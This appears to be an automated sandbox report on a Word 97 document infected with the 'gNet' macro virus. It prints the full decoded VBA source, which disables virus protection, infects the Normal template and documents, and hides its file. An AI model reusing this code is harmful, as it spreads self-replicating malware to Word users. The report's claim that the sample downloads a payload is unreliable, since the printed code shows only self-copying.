gNet Office (OLE) malware analysis — malicious · 2b1cedbfc4852e34

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-04-21 16:00:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-17

MD5: 57347520bfc744adf73eab1116cfcd90 SHA-1: 1ae5a4c11be13664b243b41b2b2430eb977cf281 SHA-256: 2b1cedbfc4852e344ae072f1c250e6ed84735b386b9860fa0fa8b21b82b1bc53

200 Risk Score

Malware Insights

gNet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1547.001 Registry Run Keys / Startup Folder

The sample is a Word document with VBA macros, identified as the 'gNet' macro virus. The macros contain a Shell() call to execute 'attrib +h gnet.vxd', indicating an attempt to hide a downloaded payload. The script also attempts to export itself to 'c:\gnet.vxd' and potentially establish persistence, suggesting it acts as a downloader for a secondary malicious artifact.

Heuristics 3

ClamAV: Doc.Trojan.VMPCK1-12 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.VMPCK1-12
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell "attrib +h gnet.vxd", vbHide
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2195 bytes
SHA-256: `58ca35c34c3482540bba9b184f8c5625a96abc0083fa77db4f2c804b0d607bad`
Detection ClamAV: Doc.Trojan.VMPCK1-12 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "gnet" ' This is gNet Macro Virus ' (c) 1999 by ksg ' astigmatiZm virus group ' www.astigmatiZm.cjb.net ' rename this file to gNet.bas and import it in MS Words Visual Basic Editor to activate ' ' WM97.gNet ' --------------------- ' (c) by KSG [ AMACC ] ' --------------------- ' [ Astig Matizm ] ' Sub gnet() On Error Resume Next Set a = NormalTemplate: Set b = a.VBProect Set c = b.VBComponents(1): Set d = c.Item Set vp = Options.VirusProtection Options.ConfirmConversions = False vp = (Rnd * 0) Options.SaveNormalPrompt = (Rnd * 0) b.VBComponents("gnet").Export "c:\gnet.vxd" ActiveDocument.ReadOnlyRecommended = False If d("gnet").Name <> "gnet" Then NotYet = True If ActiveDocument.VBProject.VBComponents.Item("gnet").Name <> "gnet" Then Still = True If NotYet = True And Still = False Then Set Blink1 = NormalTemplate.VBProject.VBComponents If NotYet = False And Still = True Then Set Blink1 = ActiveDocument.VBProject.VBComponents Blink1.import "c:\gnet.vxd" If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument If Still = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save CommandBars("tools").Controls("Macro").Enabled = False CommandBars("tools").Controls("Customize...").Enabled = False CommandBars("view").Controls("Toolbars").Enabled = False CommandBars("view").Controls("Status Bar").Enabled = False Shell "attrib +h gnet.vxd", vbHide End Sub Sub AutoExec() On Error Resume Next If Day(Now()) = 10 And Month(Now()) = 9 Then Call HelpAbout End If Call gnet End Sub Sub HelpAbout() On Error Resume Next Assistant.Visible = True With Assistant.NewBalloon .Icon = msoIconAlert .Text = "g N e t , 2 1 , k s g" .Heading = "gNeT [ ksg / astigmatiZm ]" .Animation = msoAnimationSearching .Show End With Assistant.Visible = False Call gnet End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.